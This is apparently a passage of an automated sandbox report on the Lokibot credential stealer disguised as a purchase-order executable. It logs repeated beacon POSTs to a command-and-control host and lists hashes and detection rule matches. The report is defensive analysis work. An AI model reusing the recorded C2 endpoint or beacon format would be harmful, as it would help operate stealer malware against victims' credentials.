                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:37.041826010 CET10856INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:35 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    41192.168.2.449857104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:38.818540096 CET10867OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:39.078356028 CET10871INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:37 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    42192.168.2.449864104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:40.128746986 CET10882OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:40.411902905 CET10885INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:39 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    43192.168.2.449871104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:41.470923901 CET10898OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:41.745306969 CET10901INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:40 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    44192.168.2.449873104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:43.379060030 CET10901OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:43.675276995 CET10902INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:42 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    45192.168.2.449875104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:46.514857054 CET10908OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:46.773838043 CET10908INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:45 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    46192.168.2.449876104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:49.069116116 CET10909OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:49.337191105 CET10910INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:48 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    47192.168.2.449877104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:51.061156988 CET10910OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:51.340956926 CET10911INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:50 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    48192.168.2.449879104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:53.094090939 CET10916OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:53.418189049 CET10919INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:52 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    49192.168.2.449882104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:55.310735941 CET10922OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:55.646163940 CET10922INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:54 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    5192.168.2.449770104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:21.323362112 CET1338OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:21.577928066 CET1338INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:20 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    50192.168.2.449883104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:57.010126114 CET10923OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:57.265400887 CET10924INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:56 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    51192.168.2.449884104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:58.361671925 CET10925OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:58.867147923 CET10926INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:57 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    52192.168.2.449885104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:59.960262060 CET10927OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:00.213871956 CET10927INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:59 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    53192.168.2.449886104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:17:01.212522984 CET10928OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:01.469331980 CET10929INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:00 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    54192.168.2.449887104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:17:02.582056046 CET10930OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:02.835235119 CET10930INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:01 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    55192.168.2.449888104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:17:03.930332899 CET10931OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:04.186918974 CET10931INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:03 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    56192.168.2.449889104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:17:05.232615948 CET10932OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:05.503925085 CET10933INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:04 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    57192.168.2.449890104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:17:06.577783108 CET10934OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:06.833031893 CET10934INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:05 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    58192.168.2.449891104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:17:07.881860018 CET10935OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:08.206795931 CET10936INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:07 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    59192.168.2.449892104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:17:09.745172977 CET10937OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:10.052268028 CET10937INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:08 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    6192.168.2.449771104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:24.359164000 CET1339OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:24.616121054 CET1340INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:23 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    60192.168.2.449893104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:17:11.929100037 CET10938OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:17:12.198611021 CET10939INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:17:11 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    7192.168.2.449772104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:25.808697939 CET1341OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:26.114744902 CET1341INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:24 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    8192.168.2.449773104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:27.597120047 CET1342OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:27.853188038 CET1343INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:26 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    9192.168.2.449774104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:28.997591972 CET1343OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:29.253197908 CET1344INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:28 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Code Manipulations

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Start time:07:15:06
                    Start date:14/01/2022
                    Path:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\Purchase Order #5000012803.exe"
                    Imagebase:0x400000
                    File size:247015 bytes
                    MD5 hash:D62B8A5FDB90E9241FF0EEF6EA035E32
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    General

                    Start time:07:15:07
                    Start date:14/01/2022
                    Path:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\Purchase Order #5000012803.exe"
                    Imagebase:0x400000
                    File size:247015 bytes
                    MD5 hash:D62B8A5FDB90E9241FF0EEF6EA035E32
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000003.898744992.00000000006FC000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Disassembly

                    Code Analysis

                    Reset < >